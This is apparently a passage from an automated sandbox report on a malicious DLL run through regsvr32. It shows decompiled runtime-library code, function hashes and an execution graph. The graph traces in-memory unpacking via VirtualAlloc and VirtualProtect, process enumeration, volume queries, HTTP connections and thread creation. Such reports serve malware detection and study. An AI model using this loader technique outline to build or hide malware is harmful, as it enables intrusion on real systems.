				_t332 = E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t332;
				goto 0xf9d3e807;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t332;
				goto 0xf9d3e844;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t332;
				goto 0xf9d3e844;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t332;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
				if (_a1304 >= 0) goto 0xf9d3e87b;
				_a1312 =  ~_a1304;
				asm("bts eax, 0x8");
				goto 0xf9d3e88b;
				_t335 = _a1304;
				_a1312 = _t335;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
				_a1312 = _a1312 & _t335;
				if (_a116 >= 0) goto 0xf9d3e8d1;
				_a116 = 1;
				goto 0xf9d3e8ee;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
				_a116 = 0x200;
				if (_a1312 != 0) goto 0xf9d3e901;
				_a92 = 0;
				_a64 =  &_a687;
				_t213 = _a116;
				_a116 = _a116 - 1;
				if (_t213 > 0) goto 0xf9d3e92f;
				if (_a1312 == 0) goto 0xf9d3e9cc;
				_a1480 = _a72;
				_a1296 = _t213 / _a1480 + 0x30;
				_a1488 = _a72;
				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
				_t218 = _a1296 + _a1220;
				_a1296 = _t218;
				 *_a64 = _a1296 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3e90e;
				_a104 = _t218;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
				if (_a104 == 0) goto 0xf9d3ea0b;
				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3ec7c;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ea9d;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ea9d;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
				_a84 = 0x20;
				_a92 = 1;
				_a1320 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
				if (_a76 != 0) goto 0xf9d3ec29;
				if (_a104 <= 0) goto 0xf9d3ec29;
				_t354 = _a64;
				_a1328 = _t354;
				_a1336 = _a104;
				_a1336 = _a1336 - 1;
				if (_a1336 <= 0) goto 0xf9d3ec27;
				_t249 = E000007FE7FEF9D26840(_a1336,  &_a120);
				_a1496 = _t354;
				E000007FE7FEF9D26840(_t249,  &_a120);
				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t354 + 0x10c)), _a1496);
				if (_a1340 > 0) goto 0xf9d3ebe7;
				_a1200 = 0xffffffff;
				goto 0xf9d3ec27;
				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
				_a1328 = _a1328 + _a1340;
				goto 0xf9d3eb61;
				goto 0xf9d3ec47;
				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
				if (_a1200 < 0) goto 0xf9d3ec7c;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
				if (_a96 == 0) goto 0xf9d3ec9c;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3da75;
				if (_a1216 == 0) goto 0xf9d3ecc2;
				if (_a1216 == 7) goto 0xf9d3ecc2;
				_a1504 = 0;
				goto 0xf9d3eccd;
				_a1504 = 1;
				_t257 = _a1504;
				_a1344 = _t257;
				if (_a1344 != 0) goto 0xf9d3ed13;
				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t359;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t257 != 1) goto 0xf9d3ed13;
				asm("int3");
				if (_a1344 != 0) goto 0xf9d3ed6f;
				0xf9d2ab30();
				 *_t359 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a1376 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3ed8e;
				_a1380 = _a1200;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t389, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}













                                0x7fef9d3e70c
                                0x7fef9d3e70c
                                0x7fef9d3e717
                                0x7fef9d3e72a
                                0x7fef9d3e731
                                0x7fef9d3e740
                                0x7fef9d3e745
                                0x7fef9d3e74f
                                0x7fef9d3e762
                                0x7fef9d3e768
                                0x7fef9d3e77b
                                0x7fef9d3e785
                                0x7fef9d3e78a
                                0x7fef9d3e792
                                0x7fef9d3e7a2
                                0x7fef9d3e7ac
                                0x7fef9d3e7b1
                                0x7fef9d3e7b9
                                0x7fef9d3e7c7
                                0x7fef9d3e7d2
                                0x7fef9d3e7e1
                                0x7fef9d3e7e5
                                0x7fef9d3e7ed
                                0x7fef9d3e7f7
                                0x7fef9d3e7ff
                                0x7fef9d3e807
                                0x7fef9d3e812
                                0x7fef9d3e81c
                                0x7fef9d3e823
                                0x7fef9d3e82b
                                0x7fef9d3e835
                                0x7fef9d3e83c
                                0x7fef9d3e84d
                                0x7fef9d3e858
                                0x7fef9d3e865
                                0x7fef9d3e871
                                0x7fef9d3e879
                                0x7fef9d3e87b
                                0x7fef9d3e883
                                0x7fef9d3e896
                                0x7fef9d3e8a3
                                0x7fef9d3e8b8
                                0x7fef9d3e8c5
                                0x7fef9d3e8c7
                                0x7fef9d3e8cf
                                0x7fef9d3e8d8
                                0x7fef9d3e8e4
                                0x7fef9d3e8e6
                                0x7fef9d3e8f7
                                0x7fef9d3e8f9
                                0x7fef9d3e909
                                0x7fef9d3e90e
                                0x7fef9d3e918
                                0x7fef9d3e91e
                                0x7fef9d3e929
                                0x7fef9d3e934
                                0x7fef9d3e957
                                0x7fef9d3e963
                                0x7fef9d3e990
                                0x7fef9d3e9a2
                                0x7fef9d3e9a4
                                0x7fef9d3e9b8
                                0x7fef9d3e9c2
                                0x7fef9d3e9c7
                                0x7fef9d3e9d9
                                0x7fef9d3e9e5
                                0x7fef9d3e9f5
                                0x7fef9d3e9fc
                                0x7fef9d3ea09
                                0x7fef9d3ea13
                                0x7fef9d3ea1d
                                0x7fef9d3ea26
                                0x7fef9d3ea2f
                                0x7fef9d3ea3e
                                0x7fef9d3ea4b
                                0x7fef9d3ea52
                                0x7fef9d3ea57
                                0x7fef9d3ea5f
                                0x7fef9d3ea6a
                                0x7fef9d3ea71
                                0x7fef9d3ea76
                                0x7fef9d3ea7e
                                0x7fef9d3ea89
                                0x7fef9d3ea90
                                0x7fef9d3ea95
                                0x7fef9d3eaad
                                0x7fef9d3eabd
                                0x7fef9d3eada
                                0x7fef9d3eaf8
                                0x7fef9d3eb06
                                0x7fef9d3eb11
                                0x7fef9d3eb2e
                                0x7fef9d3eb38
                                0x7fef9d3eb43
                                0x7fef9d3eb49
                                0x7fef9d3eb4e
                                0x7fef9d3eb5a
                                0x7fef9d3eb71
                                0x7fef9d3eb7a
                                0x7fef9d3eb85
                                0x7fef9d3eb8a
                                0x7fef9d3eb97
                                0x7fef9d3ebc9
                                0x7fef9d3ebd8
                                0x7fef9d3ebda
                                0x7fef9d3ebe5
                                0x7fef9d3ebff
                                0x7fef9d3ec1a
                                0x7fef9d3ec22
                                0x7fef9d3ec27
                                0x7fef9d3ec42
                                0x7fef9d3ec4f
                                0x7fef9d3ec5a
                                0x7fef9d3ec77
                                0x7fef9d3ec82
                                0x7fef9d3ec8e
                                0x7fef9d3ec93
                                0x7fef9d3ec9c
                                0x7fef9d3eca9
                                0x7fef9d3ecb3
                                0x7fef9d3ecb5
                                0x7fef9d3ecc0
                                0x7fef9d3ecc2
                                0x7fef9d3eccd
                                0x7fef9d3ecd4
                                0x7fef9d3ece3
                                0x7fef9d3ece5
                                0x7fef9d3ecec
                                0x7fef9d3ecf1
                                0x7fef9d3ecf4
                                0x7fef9d3ed06
                                0x7fef9d3ed0e
                                0x7fef9d3ed10
                                0x7fef9d3ed1b
                                0x7fef9d3ed1d
                                0x7fef9d3ed22
                                0x7fef9d3ed28
                                0x7fef9d3ed31
                                0x7fef9d3ed4c
                                0x7fef9d3ed51
                                0x7fef9d3ed61
                                0x7fef9d3ed6d
                                0x7fef9d3ed76
                                0x7fef9d3ed82
                                0x7fef9d3eda5

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg
                                • String ID: '$9
                                • API String ID: 1967237116-1823400153
                                • Opcode ID: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                • Instruction ID: 29668378713c93b892a0041d725b85e979c1ad93fe9cb8202607dd12c91b0faa
                                • Opcode Fuzzy Hash: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                • Instruction Fuzzy Hash: 0241C33660DA858AE7A18B19E8407AFB3E4F7C5752F100125E6D8C6AE8EBBDD4408F14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D27100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: DecodePointer
                                • String ID: 0*/$@'/
                                • API String ID: 3527080286-4269268540
                                • Opcode ID: 44cb388d9b870140d99a40c9b372f402bf81f41f696d4103a424b7cff1120763
                                • Instruction ID: b357231f8f0063d758982780f1c63af601305b6eea545ef6037656fa00afa9a2
                                • Opcode Fuzzy Hash: 44cb388d9b870140d99a40c9b372f402bf81f41f696d4103a424b7cff1120763
                                • Instruction Fuzzy Hash: 64411625A0AA4A92EBA09B19EC4537E23E0F785784FB15132D5CD077B5CF7EE8018745
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3D710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _unlock
                                • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgdel.cpp
                                • API String ID: 2480363372-1749241151
                                • Opcode ID: 69826465c09442dd62c721ef0480ef2ecfb8ed15fa83514cc39f9f882c8ed808
                                • Instruction ID: 19170a7b4d801314c698f141b2cab39615b7a96e1dab02ace679e734dc17c016
                                • Opcode Fuzzy Hash: 69826465c09442dd62c721ef0480ef2ecfb8ed15fa83514cc39f9f882c8ed808
                                • Instruction Fuzzy Hash: BD113D7AA2868686EBE49B94D841B6D63E1F781795F605036E68E43BA4CB3DE404CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D41200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: DestroyedExceptionFindFrameObjectUnlink
                                • String ID: csm
                                • API String ID: 1826589669-1018135373
                                • Opcode ID: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                • Instruction ID: 9f3dc625307ec028be1fda2cc305f99b8c00c3b4febe2b6a2618c0b56fcdacc0
                                • Opcode Fuzzy Hash: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                • Instruction Fuzzy Hash: 61114232944681CADFA0DF79C8812BD27E4F795B88F615135EA5D877B1CB26D981C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2F3E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _free_nolock
                                • String ID: ("Corrupted pointer passed to _freea", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\malloc.h
                                • API String ID: 2882679554-3458198949
                                • Opcode ID: 9de8216f17933041b20e0427cd6b955395f4fe92a776214bf069d9d6f9ded054
                                • Instruction ID: ad827b7ac8ab2a7eb82804d35ce3812f3a61bc9df3b9012bdfb51b84df9589d9
                                • Opcode Fuzzy Hash: 9de8216f17933041b20e0427cd6b955395f4fe92a776214bf069d9d6f9ded054
                                • Instruction Fuzzy Hash: D6014431A1C78286EBD09B6AE88472EB3D0F390350F604535E6CD43FA8DBBED4058B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Execution Graph

                                Execution Coverage:17.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:4.4%
                                Total number of Nodes:90
                                Total number of Limit Nodes:12
                                execution_graph 4111 1800010e8 4114 18001dbfc 4111->4114 4113 180001151 4121 18001dc49 4114->4121 4119 18001f7d8 4119->4113 4121->4119 4122 180014930 4121->4122 4126 1800054d8 4121->4126 4130 18000ebac 4121->4130 4134 18000e278 4121->4134 4138 1800171b8 4121->4138 4123 180014953 4122->4123 4124 180014a3a 4123->4124 4146 180023748 4123->4146 4124->4121 4129 18000552d 4126->4129 4128 180005e53 4128->4121 4129->4128 4157 18002b368 4129->4157 4131 18000ebf9 4130->4131 4133 18000ec33 4131->4133 4168 18002627c 4131->4168 4133->4121 4136 18000e29a 4134->4136 4137 18000e4bb 4136->4137 4175 180025b1c 4136->4175 4137->4121 4139 1800171da 4138->4139 4144 18001752f 4139->4144 4178 18000d12c 4139->4178 4182 180005e7c 4139->4182 4186 180019af0 4139->4186 4190 180011904 4139->4190 4194 180014aa4 4139->4194 4144->4121 4147 18002376e 4146->4147 4149 18002381b 4147->4149 4150 18000f2dc 4147->4150 4149->4124 4152 18000f3b8 4150->4152 4151 18000f59a 4151->4149 4152->4151 4154 18002a3e0 4152->4154 4156 18002a46c 4154->4156 4155 18002a531 GetVolumeInformationW 4155->4151 4156->4155 4158 18002b3f5 4157->4158 4159 18002ba3a 4158->4159 4162 1800155e0 4158->4162 4165 180008e80 4158->4165 4159->4129 4163 180015677 4162->4163 4164 180015725 InternetConnectW 4163->4164 4164->4158 4167 180008ef7 4165->4167 4166 180008fac HttpOpenRequestW 4166->4158 4167->4166 4171 180029710 4168->4171 4173 18002974b 4171->4173 4172 180029a74 Process32NextW 4172->4173 4173->4172 4174 18002633d 4173->4174 4174->4131 4176 180025b7f 4175->4176 4177 180025c05 CreateThread 4176->4177 4177->4136 4180 18000d176 4178->4180 4179 18000db07 4179->4139 4180->4179 4198 18001d128 4180->4198 4184 180005eb1 4182->4184 4183 1800064ba 4183->4139 4184->4183 4185 18001d128 CreateFileW 4184->4185 4185->4184 4188 180019b56 4186->4188 4187 18001aa27 4187->4139 4188->4187 4189 18001d128 CreateFileW 4188->4189 4189->4188 4192 180011930 4190->4192 4191 180025b1c CreateThread 4191->4192 4192->4191 4193 180011967 4192->4193 4193->4139 4196 180014ad9 4194->4196 4195 180025b1c CreateThread 4195->4196 4196->4195 4197 180014b10 4196->4197 4197->4139 4199 18001d160 4198->4199 4201 18001d46f 4199->4201 4202 180010b1c 4199->4202 4201->4180 4204 180010ba2 4202->4204 4203 180010c4a CreateFileW 4203->4199 4204->4203 4205 180025b1c 4206 180025b7f 4205->4206 4207 180025c05 CreateThread 4206->4207 4220 18002490c 4221 18002496d 4220->4221 4222 180025329 4221->4222 4223 180010b1c CreateFileW 4221->4223 4223->4221 4208 180010b1c 4210 180010ba2 4208->4210 4209 180010c4a CreateFileW 4210->4209 4211 1c0000 4212 1c0183 4211->4212 4213 1c043e VirtualAlloc 4212->4213 4216 1c0462 4213->4216 4214 1c0531 GetNativeSystemInfo 4215 1c056d VirtualAlloc 4214->4215 4217 1c0a00 4214->4217 4218 1c058b 4215->4218 4216->4214 4216->4217 4218->4217 4219 1c09d9 VirtualProtect 4218->4219 4219->4218

                                Executed Functions

                                Function 001C0000 Relevance: 74.6, APIs: 4, Strings: 38, Instructions: 1094memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 1c0000-1c0460 call 1c0aa8 * 2 VirtualAlloc 22 1c048a-1c0494 0->22 23 1c0462-1c0466 0->23 26 1c049a-1c049e 22->26 27 1c0a91-1c0aa6 22->27 24 1c0468-1c0488 23->24 24->22 24->24 26->27 28 1c04a4-1c04a8 26->28 28->27 29 1c04ae-1c04b2 28->29 29->27 30 1c04b8-1c04bf 29->30 30->27 31 1c04c5-1c04d2 30->31 31->27 32 1c04d8-1c04e1 31->32 32->27 33 1c04e7-1c04f4 32->33 33->27 34 1c04fa-1c0507 33->34 35 1c0509-1c0511 34->35 36 1c0531-1c0567 GetNativeSystemInfo 34->36 37 1c0513-1c0518 35->37 36->27 38 1c056d-1c0589 VirtualAlloc 36->38 39 1c051a-1c051f 37->39 40 1c0521 37->40 41 1c058b-1c059e 38->41 42 1c05a0-1c05ac 38->42 43 1c0523-1c052f 39->43 40->43 41->42 44 1c05af-1c05b2 42->44 43->36 43->37 46 1c05b4-1c05bf 44->46 47 1c05c1-1c05db 44->47 46->44 48 1c05dd-1c05e2 47->48 49 1c061b-1c0622 47->49 52 1c05e4-1c05ea 48->52 50 1c0628-1c062f 49->50 51 1c06db-1c06e2 49->51 50->51 55 1c0635-1c0642 50->55 56 1c06e8-1c06f9 51->56 57 1c0864-1c086b 51->57 53 1c05ec-1c0609 52->53 54 1c060b-1c0619 52->54 53->53 53->54 54->49 54->52 55->51 60 1c0648-1c064f 55->60 61 1c0702-1c0705 56->61 58 1c0917-1c0929 57->58 59 1c0871-1c087f 57->59 62 1c092f-1c0937 58->62 63 1c0a07-1c0a1a 58->63 64 1c090e-1c0911 59->64 65 1c0654-1c0658 60->65 66 1c06fb-1c06ff 61->66 67 1c0707-1c070a 61->67 69 1c093b-1c093f 62->69 88 1c0a1c-1c0a27 63->88 89 1c0a40-1c0a4a 63->89 64->58 68 1c0884-1c08a9 64->68 70 1c06c0-1c06ca 65->70 66->61 71 1c070c-1c071d 67->71 72 1c0788-1c078e 67->72 95 1c08ab-1c08b1 68->95 96 1c0907-1c090c 68->96 75 1c09ec-1c09fa 69->75 76 1c0945-1c095a 69->76 73 1c06cc-1c06d2 70->73 74 1c065a-1c0669 70->74 77 1c071f-1c0720 71->77 78 1c0794-1c07a2 71->78 72->78 73->65 80 1c06d4-1c06d5 73->80 84 1c067a-1c067e 74->84 85 1c066b-1c0678 74->85 75->69 86 1c0a00-1c0a01 75->86 82 1c095c-1c095e 76->82 83 1c097b-1c097d 76->83 87 1c0722-1c0784 77->87 90 1c085d-1c085e 78->90 91 1c07a8 78->91 80->51 97 1c096e-1c0979 82->97 98 1c0960-1c096c 82->98 100 1c097f-1c0981 83->100 101 1c09a2-1c09a4 83->101 102 1c068c-1c0690 84->102 103 1c0680-1c068a 84->103 99 1c06bd-1c06be 85->99 86->63 87->87 104 1c0786 87->104 105 1c0a38-1c0a3e 88->105 93 1c0a4c-1c0a54 89->93 94 1c0a7b-1c0a8e 89->94 90->57 92 1c07ae-1c07d4 91->92 126 1c0835-1c0839 92->126 127 1c07d6-1c07d9 92->127 93->94 107 1c0a56-1c0a78 93->107 94->27 116 1c08bb-1c08c8 95->116 117 1c08b3-1c08b9 95->117 96->64 108 1c09be-1c09bf 97->108 98->108 99->70 109 1c0989-1c098b 100->109 110 1c0983-1c0987 100->110 114 1c09ac-1c09bb 101->114 115 1c09a6-1c09aa 101->115 112 1c06a5-1c06a9 102->112 113 1c0692-1c06a3 102->113 111 1c06b6-1c06ba 103->111 104->78 105->89 106 1c0a29-1c0a35 105->106 106->105 107->94 122 1c09c5-1c09cb 108->122 109->101 120 1c098d-1c098f 109->120 110->108 111->99 112->99 121 1c06ab-1c06b3 112->121 113->111 114->108 115->108 124 1c08ca-1c08d1 116->124 125 1c08d3-1c08e5 116->125 123 1c08ea-1c08fe 117->123 128 1c0999-1c09a0 120->128 129 1c0991-1c0997 120->129 121->111 130 1c09cd-1c09d3 122->130 131 1c09d9-1c09e9 VirtualProtect 122->131 123->96 142 1c0900-1c0905 123->142 124->124 124->125 125->123 135 1c083b 126->135 136 1c0844-1c0850 126->136 133 1c07db-1c07e1 127->133 134 1c07e3-1c07f0 127->134 128->122 129->108 130->131 131->75 138 1c0812-1c082c 133->138 139 1c07fb-1c080d 134->139 140 1c07f2-1c07f9 134->140 135->136 136->92 141 1c0856-1c0857 136->141 138->126 144 1c082e-1c0833 138->144 139->138 140->139 140->140 141->90 142->95 144->127
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1218933398.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1c0000_regsvr32.jbxd
                                Similarity
                                • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                • API String ID: 2313188843-2517549848
                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                • Instruction ID: f654c121e0f75809087bb2166a3c52b90b1e84719569e0c161f38774067afe60
                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                • Instruction Fuzzy Hash: AD72B531618B48CBDB2DDF18C885BB9B7E1FBA8305F14462DE88AD7211DB34D946CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000BEF0 Relevance: 5.4, Strings: 4, Instructions: 360COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &$5RX$WE0$\h]
                                • API String ID: 0-3485045178
                                • Opcode ID: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                • Instruction ID: bcdd786ba30a02497e69aa8425991a4f00e6ab9cdb2a577162cf86c9936701da
                                • Opcode Fuzzy Hash: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                • Instruction Fuzzy Hash: 4502E4705187C88BD794DFA8C48A69FFBE1FB94744F104A1DF486862A0DBF4D949CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180017C8C Relevance: 4.0, Strings: 3, Instructions: 298COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 672 180017c8c-180017cca 673 180017ccf-180017cd4 672->673 674 180017cda-180017cdf 673->674 675 180017f5b-180017fc3 call 180025c30 673->675 676 180017f51-180017f56 674->676 677 180017ce5-180017cea 674->677 683 180017fc5-180017fca 675->683 684 180017fcf-180017fd3 675->684 676->673 679 180017fd8-180017fdd 677->679 680 180017cf0-180017d7f call 18001bd40 677->680 679->673 685 180017fe3-180017fe6 679->685 686 180017d84-180017d89 680->686 687 180017f43-180017f4c 683->687 684->679 688 180017fec-1800180ab call 180011ccc 685->688 689 1800180ad-1800180b4 685->689 686->688 690 180017d8f-180017d94 686->690 687->673 692 1800180b7-1800180d1 688->692 689->692 690->685 693 180017d9a-180017d9f 690->693 693->687 695 180017da5-180017e0e call 180025c30 693->695 695->685 698 180017e14-180017f3d call 180024360 call 180011ccc 695->698 698->685 698->687
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 47T]$K_j$is[
                                • API String ID: 0-2699472077
                                • Opcode ID: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                • Instruction ID: 6016c1221021197edd7f817fb9cbd09fcb5ac8bbf6c5f54f5697c1ffe249b4d0
                                • Opcode Fuzzy Hash: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                • Instruction Fuzzy Hash: 2CD127719047CD8FCF99CFA8C88A6EE7BB1FB48344F50821DE80697651C7B4990ACB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180029710 Relevance: 4.0, Strings: 3, Instructions: 232COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
